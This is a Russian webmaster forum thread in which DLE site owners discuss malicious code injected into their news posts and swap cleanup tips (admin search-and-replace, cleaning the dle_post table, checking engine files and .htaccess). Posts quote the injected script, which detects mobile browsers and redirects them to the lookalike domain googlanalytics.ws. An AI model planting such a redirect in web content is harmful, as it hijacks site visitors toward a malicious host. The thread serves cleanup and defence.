оявление постороннего кода в новостях DLE

dakter
На сайте с 08.02.2012
Offline
121
#101

Кто подскажет как удалить вредоносный код целиком -

<script type=\\&quot;text/javascript\\&quot;&gt;if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){window.location = \\&quot;http://googlanalytics.ws/\\&quot;;}&lt;/script>

В Notepad пишет не могу найти текст. В админке в разделе поиск и замена тоже не меняет, только небольшими кусками и то не все.

ProLiant
На сайте с 07.12.2005
Offline
244
#102
HUTUR:
Такая же ситуация.
Почистил все новости, сменил пароли, установил заплатку и т.д. Вроде все нормально, но на след день появился зараза появилась опять, только код начинаться начал с iframe. Все новости чистые. Может кто подскажет, где искать эту заразу? И какого вида будет код?

Если код в новостях, попробуйте выделить его, в админке есть "Поиск и замена" в новостях, вставить туда, замена на - оставить пустое поле. Затем сделать перестроение публикаций по новостям.

Кто подскажет как удалить вредоносный код целиком -

А код где сидит?

Кстати, никто не сталкивался? На некоторых сайтах после обновления папки MIN архивом по этой ссылке https://code.google.com/p/minify/downloads/detail?name=minify-2.1.7.zip&can=2&q= в админке начинаются проблемы. На главной админке внизу перестают отображаться вкладки (там где автопроверка системы и т.п.) и в форме добавления новостей тоже верхние вкладки.

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
HUTUR
На сайте с 07.06.2010
Offline
89
#103
ProLiant:
Если код в новостях, попробуйте выделить его, в админке есть "Поиск и замена" в новостях, вставить туда, замена на - оставить пустое поле. Затем сделать перестроение публикаций по новостям.

В том то и дело, что из новостей, я все вычистил. А при заходе на сайт все равно эта зараза выскакивает.

dakter
На сайте с 08.02.2012
Offline
121
#104
А код где сидит?

Код в новостях, короткой и полной. При поиске и замене не срабатывает, в Notepad тоже весь не находит, только по частям.

Вот что осталось после удаления -

= \\\"http://googlanalytics.ws/\\\";}

Могу еще удалить саму ссылку на вредоносный сайт , но если ввести код целиком то не находит, а вручную искать замучаешься.

Amilo Group
На сайте с 06.07.2013
Offline
2
#105
HUTUR:
В том то и дело, что из новостей, я все вычистил. А при заходе на сайт все равно эта зараза выскакивает.

А какая у Вас панель управления хостингом?

dakter
На сайте с 08.02.2012
Offline
121
#106

Все почистил, но после удаления кода выделенного жирным и восстановления базы выдает ошибку, проблема именно в этом коде.

текст', 'if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null)window.location = \\http://****', 'window, phone, location, всегда, navigator, ce|ppc|smartphone|blackberry|mtk|bada|windows, googlanalytics, match, userAgent, android|midp|j2me|symbian|series, mobile|windows, 60|symbos|windows, сделал, когда, вышел
HUTUR
На сайте с 07.06.2010
Offline
89
#107
Amilo Group:
А какая у Вас панель управления хостингом?

Если честно, не понял вопроса? Что значит какая панель?

VV
На сайте с 17.01.2013
Offline
12
#108

Такая фигня не от модулей... Мне кажется, это как то связано с рекламой, может.

У меня стоит:

-сапа

-adskape.ru

-advmaker.net

Может, там как то через баннеры и получили доступ к БД.

ProLiant
На сайте с 07.12.2005
Offline
244
#110
HUTUR:
В том то и дело, что из новостей, я все вычистил. А при заходе на сайт все равно эта зараза выскакивает.

Значит тогда у вас другой случай, смотрите заразу в файлах двига (в папке engine), в аксессе (тот, что в корне), по файлам шаблона пройдитесь.

---------- Добавлено 19.09.2013 в 08:40 ----------

dakter:
Код в новостях, короткой и полной. При поиске и замене не срабатывает, в Notepad тоже весь не находит, только по частям.

Вот что осталось после удаления -

= \\\"http://googlanalytics.ws/\\\";}

Могу еще удалить саму ссылку на вредоносный сайт , но если ввести код целиком то не находит, а вручную искать замучаешься.

Значит как-то некорректно удалили, что куски остались. Экспортируйте из базы только таблицу dle post и попробуйте еще по ней пройтись в текстовом редакторе поиском и заменой. Если после удаления остались именно такие одинаковые куски, то вроде сложности нет их поиском прогнать и убрать.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий